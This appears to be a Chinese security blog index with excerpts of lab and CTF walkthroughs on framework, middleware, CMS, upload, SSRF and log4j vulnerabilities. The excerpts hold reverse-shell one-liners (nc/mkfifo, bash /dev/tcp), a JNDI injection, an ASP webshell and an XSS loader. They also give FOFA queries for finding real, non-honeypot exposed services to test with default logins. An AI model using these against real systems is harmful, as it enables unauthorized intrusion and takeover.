- 博客(25)
- 收藏
- 关注
原创 常见的框架漏洞
2.使用工具 shiro反序列化漏洞综合利用 v2.2 输入目标地址,检测秘钥-->爆破秘钥-->检测当前利用链,若存在利用链,则进入命令执行或内存马区块,反之爆破利用链。1.打开环境,抓包发送重放器,发送,若在 Cookie 中有 rememberMe=deleteMe 则存在漏洞。3.反弹 shell ,先写入 shell.sh ,开启监听,执行 shell.sh ,即可反弹到 shell。2.在 URL 处拼接以下代码,访问后发现中间数字相加,证明中间可执行代码。1.打开环境,访问漏洞地址。
2024-08-07 19:43:15
471
原创 常见中间件漏洞
2.拼接 /console/login/LoginForm.jsp 进入登录页面,登录,依次点击 base_domain-->高级-->启用 web 服务测试页后保存设置。1.打开环境,拼接以下目录,进入登录界面,登录, 这⾥我们使用得复现环境不存在,所以需要密码(正常环境无需密码直接可进入)python2 CVE-2020-1938.py -p 8009 -f /WEB-INF/web.xml 环境ip。2.登录,账号密码: weblogic/Oracle@123,进入 部署-->安装-->上传文件。
2024-08-06 21:35:27
1897
原创 未授权访问漏洞(非重点 下)
1.在 fofa 使用 (app="APACHE-dubbo")&&(is_honeypot=false && is_fraud=false) 获取资产。1.在 fofa 使用 (port="5900")&&(is_honeypot=false && is_fraud=false) 获取资源。1.在 fofa 使用 title="Druid Stat Index" 获取资产。1.在 fofa 使用 port="389" 获取资源。1.在 fofa 使用 "nfs" 获取资产。
2024-08-05 19:06:02
639
原创 未授权访问漏洞(非重点 中)
1.在 fofa 使用 port="15672"/port="15692"/port="25672" 获取资源。1.在 fofa 使用 body="ActiveMQ" && port="8161" 获取资源。2.打开后若点击登录,默认账户密码为 admin/admin ,若可登录,则存在漏洞。2.打开后若点击登录,默认账户密码为 guest/guest ,若可登录,则存在漏洞。添加ftp站点–>下一步---->分配IP无ssl----->匿名,匿名用户—>完成。2.打开后若无需登录,则存在漏洞。
2024-08-05 19:03:57
446
原创 未授权访问漏洞(非重点 上)
1.在 fofa 中使用 "Elasticsearch" && port="9200" 获取资源。2.在 kali 中使用 echo envinc ip 2181 测试是否存在漏洞。1.在 fofa 中使用 "kibana" && port="5601" 获取资源。1.在 fofa 中使用 port="2181" 获取资源。1.用fofa语法 port="11211" 搜索资产。2.若无需登录就可进入,则存在漏洞。2.若无需登录就可进入,则存在漏洞。2.使用 telnet 连接。1.在fofo里搜索。
2024-08-05 19:01:09
449
原创 未授权访问漏洞(重点版─=≡Σ(((つ•̀ω•́)つ)
1. 使用工具执行以下命令获取目标的命令执行环境,交互时输入i键会获取Shell环境。进入目录:cd/vulhub-master/redis/4-unacc。vi docker-compose.yml //查看端口和版本号。启动:docker-compose up-d。检查:docker-compose ps。在kali上安装redis进行服务链接。2. 输入命令获取信息了。
2024-08-05 18:49:33
865
原创 常见的cms漏洞
3. 将slide TextStatus 中的内容换为 asp 一句话木马:1%25><%25Eval(Request (chr(65)))%25><%25 ,密码为a ,影响文件 /config/AspCms_Config.asp。打开变量模块,搜索 gen 将第一个修改为 ON,开启日志,第二个修改文件保存位置,其余操作参考 pass 1。1.打开环境文件上传,使用哥斯拉生成 asp 木马文件,压缩成压缩包上传,解压。1.进入网页后台,登录,需要提权,打开文件式管理器,上传木马文件。
2024-08-03 16:07:46
526
原创 业务逻辑漏洞
2.回到原网页登录自己的账号,抓包,复制cookie中的数据,粘贴到管理员创建用户的数据包,由于环境问题二者的 cookie 一样,正常情况 cookie 是不同的。1.寻找漏洞网站,注册,获取验证码并抓包,发送攻击模块,选择 Null payloads ,选择攻击次数。1.找到有漏洞的网页,搭建与其相同的网站,抓管理员用户创建用户时的数据包,发送重放器。1.找到漏洞网页后,注册用户并登录,查看个人信息,抓包,发送重放器。2.将 thisnum 改为负数,放包后可以发现金额变为负数,支付。
2024-08-02 16:04:52
490
原创 serial 反序列化靶机
5.在 kali 开启监听, 抓包,发送重放器,修改 cookie ,并在 GET 处添加参数以及 shell 反弹语句rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+kali ip+7777+>/tmp/f。4.构造下方代码 1.php ,保存到自己的网站下运行,实现将 welcome 替换为 Log ,同时使用文件包含漏洞上传木马文件,最后将代码序列化并 base64 编码。2.扫描靶机ip,端口,访问。
2024-08-01 21:57:20
689
原创 jangow-01
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.238.132 443 >/tmp/f');?>
2024-07-31 23:10:58
281
原创 log4j2 漏洞
4.复制 JDK1.8 以 ldap 开头的代码,将/solr/admin/cores?action=${jndi:ldap://服务器ip/ozquxd} 中的 ldap 替换,访问,发现监听窗口已经获取 shell。我这可能是环境问题,普通监听可以监听到,但shell反弹死活接收不到,反弹代码,日志生成代码也检查了好几次,就是接收不到。注:-C后面的参数是要执行的命令以及编码方式,-A后面就是对应ip地址。bash -i >& /dev/tcp/服务器ip/8888 0>&1。
2024-07-31 22:43:51
541
原创 Bugku CTF 合集
1.打开靶场,发现是文件上传,查看源码,发现本关会将上传的 jpg,png 后缀的文件以 python 运行后返回结果。本关打开靶场后发现没有任何可利用数据,所以直接查看源代码,使用 ctrl+f 查询 flag 直接获取flag。1.打开靶场,翻译得知需要输入一个flag作为参数,检查源代码,发现可以设置 secret key 作为变量。4.将 ls 换为 cat 添加 flag 路径,查看 flag 的内容,获取 flag。1.打开靶场,发现这关依旧需要以 flag 作为参数,源码中没有提示。
2024-07-30 19:26:42
673
原创 文件解析漏洞合集
1.运行 phpStudy for iis,在其根目录下创建 1.jpg ,用记事本打开,写入 <?2.在 jpg 后加两个空格和 .php ,在 hex 中将第二个空格对应的 20 改为 00 ,放包。3.访问木马路径,需要添加两个空格和 .php ,抓包,将 %20 手动换为两个空格,同上修改 hex。2.本漏洞会从右往左扫描后缀,扫描到可识别的符合要求的后缀后就会停止,故在 php 后添加 .jpg。本题与IIS7漏洞相似,都在访问木马路径时,在后方添加 /.php 使上传的木马可以被解析。
2024-07-30 17:04:15
476
原创 hackme,aiweb,tomato靶机解析大礼包
5.之前扫描出来 2211 远程连接端口,尝试连接,然后访问日志/var/log/auth.log,发现无论是否连接成功,日志中都会出现用户名及其操作。3.发现无目录,则可能是端口不同,使用 nmap 扫描,发现有 8888 和 2211 端口,同时使用 dirb 扫描目录。4.依次查看,发现第一个目录返回403,扫描目录,获取绝对路径,第二个目录不可用,但去掉upload可用。5.输入不同id,数据变化,存在注入,提交抓包,并在提交框参数后加 *2.进入页面,发现没有可用数据,扫描目录。
2024-07-29 19:01:57
643
原创 upload-labs 靶场解析合集
2.修改木马文件的类型和后缀,在文件上传地址处添加 2.php%00 ,意思是将上传的内容放到 2.php 中, %00 用于截断后方的代码,确保木马文件内容被上传到 2.php 中。本题为条件竞争,上传的 php 文件由于不符合条件,会在短时间内删除,所以我们可以写一个下崽 php 文件,当访问此文件时,会生成一个 php 木马文件,此文件不会被删除。2.在 .php 后输入 . 进行绕过,在windows中, . 由于在末尾,会自动去除,不影响木马文件的使用。
2024-07-27 21:00:51
1915
原创 XXE 靶机解析
1.下载并安装靶机2.查看虚拟机所使用网卡的网段,使用端口扫描工具获取漏洞页面网址,http的端口为80,所以端口设为803.访问该网页4.扫描该ip的目录5.访问第一个网址(ps:第二个为默认网页),发现该ip下有两个可访问路径,分别访问,发现只有/xxe可以进入6.抓包,发现存在XXE漏洞,回显位置为 name 栏,现在寻找可能存在flag或账号密码的文件7.扫描http://192.168.32.150
2024-07-25 20:02:56
563
原创 CTFHub-SSRF解析合集
1.打开靶场和kali,在kali上打开 Gopherus-master 工具运行, 由于题目为 fastcgi 协议,所以指定 fastcgi, 提交一个靶场内的php文件地址,建议为默认的 index.php ,输入一句话木马,生成payload。1.打开靶场和kali,在kali上打开 Gopherus-master 工具运行, 由于题目为 fastcgi 协议,所以指定 fastcgi, 提交一个靶场内的php文件地址,建议为默认的 index.php ,输入一句话木马,生成payload。
2024-07-24 20:20:04
1669
原创 xss flash 钓鱼获取主机控制权
注:改名是因为 index.html 代码中点击下载的路径为 ./flashcenter_pp_ax_install_cn.exe 相比较改文件中不知道有几处的代码,直接改名更轻松。注:修改完后图标未变可能是因为有缓存,将其拉倒桌面或在index.html点击下载后发现图标改变。<script src="http://物理机ip/1.js"></script>点击下载,完成后进行安装,发现 kali 成功监听。将压缩后的安装包拖入软件,替换图标后保存。将原安装包拖入软件,保存其图标至桌面。
2024-07-23 20:22:16
786
原创 墨者学院-SQL注入漏洞测试(登录绕过)解析
1.打开靶场,发现是登录页面,并且没有其他页面,直接抓包并发送重放器2.题目说明蹦数据库使用管理员用户,且密码复杂,所以直接在用户名处注入3.闭合后,由于账户正确,整条语句正确,所以无需密码,直接登录到了后台
2024-07-22 19:41:05
233
原创 墨者学院-SQL手工注入漏洞测试(Db2数据库)解析
由于是Db2数据库,所以当查询不到列时,直接指定列名,根据ID猜测name与password为大写,若未查到,可换username,userpassword等。通过题目得知本题为Db2数据库,故得知数据库为 DB2INST1。切记查询时带上ID一起查询,否则查出的数据是错误的,无法登陆。
2024-07-22 19:38:06
355
原创 墨者学院-SQL注入漏洞测试(POST)解析
正常流程应该是查到回显点后,在其位置查所在数据库,数据表,列名以获取账号密码登录后获取 key ,但这里不知道为什么直接登录到了后台,直接获取了key。注:此处不可使用 --+ 闭合, + 会被识别为空格,由于账号栏后方为空,空格会被省略,使用 # 即可。order by 3 未报错,order by 4 报错,证明有三列数据。在name之后加单引号引起报错,则name可作为注入点。
2024-07-22 19:35:00
281
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人